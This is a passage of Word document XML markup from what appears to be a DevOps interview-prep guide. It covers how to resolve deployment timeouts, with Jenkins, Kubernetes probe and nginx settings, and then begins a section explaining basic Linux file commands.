        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(Optionally) delete or archive the file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33485BE2" w14:textId="44745F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3910" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="352BD6FD" w14:textId="1D7C698C" w:rsidR="00B5508A" w:rsidRPr="00CE4B95" w:rsidRDefault="00E12B8D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="967" w:name="_Toc197868181"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>If we increase timeout then how can we resolve it? Deployment related issue and how will you handle it</w:t>
      </w:r>
      <w:r w:rsidR="00B5508A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="967"/>
    </w:p>
    <w:p w14:paraId="1C5798AE" w14:textId="70660F74" w:rsidR="001D4AC3" w:rsidRPr="00617E2C" w:rsidRDefault="001D4AC3"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facing a </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>timeout issue during deployment</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, increasing the timeout is just a </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>temporary workaround</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Here's a structured way to </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resolve and handle the issue properly</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6789007C"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2719F">
          <v:rect id="_x0000_i3911" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE4748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tep-by-Step Approach to Handle Timeout in Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105662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Identify the Cause of Timeout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0B39E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s can happen due to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B93D3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ow application startup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676F43B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work issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3284EB2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 image build taking too long</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303D980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liveness probes in Kubernetes failing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FCFC4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job timeout (like Jenkins, GitHub Actions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15665C0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balancer health check failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E5292D"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6DC9BC">
          <v:rect id="_x0000_i3912" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C695266"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Increase Timeout (Temporary Fix)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8B15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ou can increase timeout in the relevant config:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D618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 pipeline:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416629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time: 20, unit: 'MINUTES') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075ABC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your deployment steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0F98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546BD14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ubernetes readiness probe:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4749A9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Probe:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF9741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httpGet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE84EB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ath: /health</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E213FD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rt: 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C99ED4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itialDelaySeconds: 30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383060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timeoutSeconds: 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F9F3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eriodSeconds: 15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A077A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Threshold: 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF994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ginx Ingress:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C90D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connect-timeout 600;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C170BB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send-timeout 600;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2931C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read-timeout 600;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1666EE5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11D7F">
          <v:rect id="_x0000_i3913" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D34E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lastRenderedPageBreak/>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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141"/>
      </w:tblGrid>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="7E34D212" w14:textId="77777777" w:rsidTr="001D4AC3">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1678B510"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ssue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FC6F1B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ix</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="1C6D5D5A" w14:textId="77777777" w:rsidTr="001D4AC3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B6C0A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p takes too long to start</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0AE55E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file the startup; preload resources; reduce startup dependencies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="75090724" w14:textId="77777777" w:rsidTr="001D4AC3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AA3050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vy Docker build</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B040A3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multi-stage builds; cache layers; move to smaller base images</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="3C43FDC6" w14:textId="77777777" w:rsidTr="001D4AC3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7663F97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8s probe failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74675C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 /health endpoint is lightweight and fast; adjust delay/timing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="3D3CD5FC" w14:textId="77777777" w:rsidTr="001D4AC3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="176B69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 pipeline timeout</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EC1D60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reak into smaller steps; add better logging; monitor slow steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="04E667C0" w14:textId="77777777" w:rsidTr="001D4AC3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61E9FFA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fra slow (e.g., AWS/GCP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6901CB7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disk/network IOPS; consider better instance types</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="32E19C11" w14:textId="77777777" w:rsidTr="001D4AC3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1626D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B migrations taking time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C451F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ptimize Liquibase/Flyway; avoid heavy DDL changes in live traffic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="142D129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54FB3">
          <v:rect id="_x0000_i3914" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="202FF41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 Scenario: Kubernetes Deployment Timeout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB3F52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blem</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Pod restart keeps failing during deploy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D0374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x</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E65AE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pod logs: kubectl logs &lt;pod&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3AA9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djust readinessProbe and livenessProbe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27970BE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itor pod: kubectl describe pod &lt;pod&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AF4B1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x application to respond faster (avoid blocking code at startup)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E1A753"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F7991">
          <v:rect id="_x0000_i3915" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DCE46F"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st Practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333442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ways </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>monitor logs</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and metrics during deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E9047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lement </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>health check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lerting</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645D37B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rolling update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retry mechanisms</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6730979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aintain </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>deployment scripts</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Git for traceability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF0CEAD" w14:textId="0D8EDD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3916" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B52DCE" w14:textId="77777777" w:rsidR="006C0B8D" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0B8D">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DF86" w14:textId="32D0F783" w:rsidR="00735B9A" w:rsidRPr="00CE4B95" w:rsidRDefault="00735B9A" w:rsidP="00735B9A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="968" w:name="_Toc197868182"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Linux</w:t>
      </w:r>
      <w:bookmarkEnd w:id="968"/>
    </w:p>
    <w:p w14:paraId="2AD80FBB" w14:textId="77777777" w:rsidR="002B15DE" w:rsidRPr="00CE4B95" w:rsidRDefault="002B15DE" w:rsidP="002B15DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F5F1D79" w14:textId="4F94399A" w:rsidR="005F7378" w:rsidRPr="00CE4B95" w:rsidRDefault="001072AE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="969" w:name="_Toc197868183"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Linux commands</w:t>
      </w:r>
      <w:r w:rsidR="005F7378" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="969"/>
    </w:p>
    <w:p w14:paraId="0AAE2C19" w14:textId="4718B5B3"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File and Directory Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCE03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s</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Lists files and directories in the current directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D78992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 List files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6699082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l         # Detailed list (permissions, size, date)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DB5C0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a         # List all files including hidden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5565219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w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Changes the current directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C5D96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home/user       # Change to the specified directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7830EA9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up one level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A4EE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to home directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D64A5A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wd</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Prints the current working directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7933025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wd        # Shows the current directory path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34ED3F7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kdir</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Creates a new directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA952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kdir newdir   # Create a directory named 'newdir'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C882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dir</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Removes an empty directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653DEA7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dir directory_name  # Removes a directory if it's empty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13580E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w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Removes files or directories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34278A3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file.txt        # Removes a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEF09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r folder_name  # Removes a directory and its contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4FF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p</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Copies files or directories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F6FFA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source.txt destination.txt       # Copy a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BA0ED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r source_dir destination_dir    # Copy a directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D84D4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v</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Moves or renames files or directories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1918C02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old_name.txt new_name.txt       # Rename a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6591916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file.txt /home/user/            # Move file to another directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8518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uch</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Creates an empty file or updates the timestamp of an existing file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39023F0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uch file.txt        # Creates or updates file.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2638CF74"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File Viewing and Editing Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7B5BC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at</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Displays the content of a file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537D85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t file.txt         # View content of file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11891B1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ss</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allows scrolling through file contents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E10A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ess file.txt        # View file content one screen at a time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B565BE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d</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Displays the first few lines of a file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B11BF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file.txt        # Default shows first 10 lines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F555F5"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0 file.txt  # Show first 20 lines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EF567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il</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
